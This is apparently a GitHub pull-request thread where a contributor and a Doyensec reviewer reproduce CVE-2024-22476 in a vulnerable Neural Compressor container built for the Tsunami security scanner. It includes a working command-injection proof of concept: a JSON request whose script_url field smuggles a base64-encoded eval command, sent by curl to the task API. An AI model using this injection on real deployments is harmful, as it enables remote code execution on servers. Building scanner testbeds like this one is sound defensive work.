Closed: frkngksl closed this 4 months ago
Hi @frkngksl. Thank you for your contribution. Can you please add the steps to reproduce the vulnerability manually? These will serve to confirm the differences between the safe and the vulnerable version of the deployed container.
Feel free to reach out ~ Leonardo (Doyensec)
Hi @leonardo-doyensec,
Sure! In the PoC, the payload creates a file under the $HOME directory. The base64-encoded command is echo "Domain expansion" > ~/attack.py.
Save the following JSON to a file called task_request.json:
{
"script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiB+L2F0dGFjay5weSI= | base64 --decode)\"",
"optimized": "False",
"arguments": [
"--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"
],
"approach": "static",
"requirements": [],
"workers": 1
}
After that, just execute the following command via curl. This is a one-step vulnerability:
curl -X POST -H "Content-Type: application/json" --data @./task_request.json http://127.0.0.1:8000/task/submit/
You can verify the vulnerability from a bash terminal inside the container.
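For example, a quick check from a shell inside the container (this assumes the ~/attack.py variant of the payload above; the expected file content is just the echoed string):
ls -l ~/attack.py
cat ~/attack.py   # should print: Domain expansion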
PoC Video: https://drive.google.com/file/d/12DPdwmmTJhBBlX0tU-O21cidr4JGyrV7/view?usp=sharing Ref: https://huntr.com/bounties/877a517f-76ec-45be-8d3b-2b5ac471bfeb
Hi @frkngksl. I cannot reproduce the vulnerability on my side. I have deployed the vulnerable container, but if I follow your steps, the file is not created.
Hi @leonardo-doyensec,
Sorry for the inconvenience, I guess there is an issue with the base64 command. Can you try this one? It will create attack.py under the root directory (/).
{
"script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiAvYXR0YWNrLnB5 | base64 --decode)\"",
"optimized": "False",
"arguments": [
"--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"
],
"approach": "static",
"requirements": [],
"workers": 1
}
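If it helps, the embedded payload can be decoded locally before submitting the request, to confirm exactly what the injected shell fragment will run (plain coreutils base64, nothing project-specific is needed):
echo 'ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiAvYXR0YWNrLnB5' | base64 --decode   # prints: echo "Domain expansion" > /attack.py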
This is still not working on my side. I've tried changing the command to write to /tmp, but that does not seem to work either.
Hi again @leonardo-doyensec, let me describe what I'm executing in detail. After building the image from the Dockerfile, I'm simply executing the following command:
sudo docker run --name neuralcompressor-vuln --network host -it neuralcompressor:vuln bash
This opens a bash terminal inside the container. In that terminal, I'm executing the following command:
neural_solution --conda_env test start
After executing the command, please don't close the terminal window, and then send the request with curl. After sending the curl command, the file should appear under the root directory within 3-4 seconds. I could also record a video if you want, because I don't know what the problem is.
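As an additional sanity check (my suggestion, not part of the original steps): because the container runs with --network host, you can confirm from the host that the REST API is actually listening before submitting the task, and then look for the file from a shell inside the container.
curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:8000/   # run on the host; a non-000 status means something is listening on port 8000
ls -l /attack.py && cat /attack.py                                # run inside the container, a few seconds after submitting the task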
These are the exact steps that I'm doing. However, even if I get "msg":"Task submitted successfully", the command is not executed and the file is not created.
Are the steps that you have provided, including building and deploying the container, working on your side?
Yes, it is working; I ran the command several times. The screenshot that I provided was taken directly from my environment. How can I help you solve this problem? Do you have any suggestions?
I'm using Ubuntu 22.04 as the development and test environment. I didn't configure Docker to run without sudo, and when I open a bash shell inside the container, it runs as root. What do you think about deleting all images in your environment and doing a fresh build?
sudo docker rmi -f $(sudo docker images -aq)
sudo docker rm $(sudo docker ps -a -q)
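Optionally (my suggestion, not strictly required), you can also clear the Docker build cache so the next build does not reuse stale layers:
sudo docker builder prune -af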
One last note is that this form of command execution (i.e. echo
Lastly, I have pushed my built image to Docker Hub, so you may try this version via the following commands:
sudo docker run --network host -it frkngksl/neuralcompressor:latest /bin/bash
neural_solution --conda_env test start (inside the container bash)
Once again, the task_request I have used is below. The vulnerability is triggered after neural_solution accesses this GitHub link, so you may also want to test the container's internet connectivity (a quick check is sketched after the request below).
curl -X POST -H "Content-Type: application/json" --data @./task_request.json http://127.0.0.1:8000/task/submit/
{
"script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification & eval \"$(echo ZWNobyAiRG9tYWluIGV4cGFuc2lvbiIgPiAvYXR0YWNrLnB5 | base64 --decode)\"",
"optimized": "False",
"arguments": [
"--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"
],
"approach": "static",
"requirements": [],
"workers": 1
}
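For the connectivity check mentioned above, something like the following from a shell inside the container should be enough (this assumes curl is available in the image):
curl -sI https://github.com | head -n 1   # any HTTP status line here means the container can reach GitHub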
I hope this works for you. If not, could you send me the backend logs under /ns_workspace/serve_log/?
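If it comes to that, one way to collect them is to copy the directory out of the container from the host. The container name below matches the earlier docker run example; adjust it if your container is named differently:
sudo docker cp neuralcompressor-vuln:/ns_workspace/serve_log ./serve_log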
Hi @frkngksl.
I was able to successfully reproduce the bug in the vulnerable configuration. After removing all my other Docker images and starting again from scratch, it reproduces reliably. You should add the steps to reproduce the vulnerability in the testbed; it would be nice to have the correct task_request.json file in the directory with the Dockerfiles.
Feel free to reach out ~ Leonardo (Doyensec)
Hi @leonardo-doyensec, glad to hear that! I committed the changes that you requested.
Thank you for your changes @frkngksl. I would highly recommend putting the steps to trigger the vulnerability in the vulnerable section, instead of the safe one.
Hi @leonardo-doyensec, I thought that opening a new subsection for triggering the vulnerability would be more appropriate. I sent the commit; what do you think?
Hi, I think that is crystal clear.
Hi,
This is a vulnerable environment for CVE-2024-22476. The related issue is https://github.com/google/tsunami-security-scanner-plugins/issues/494.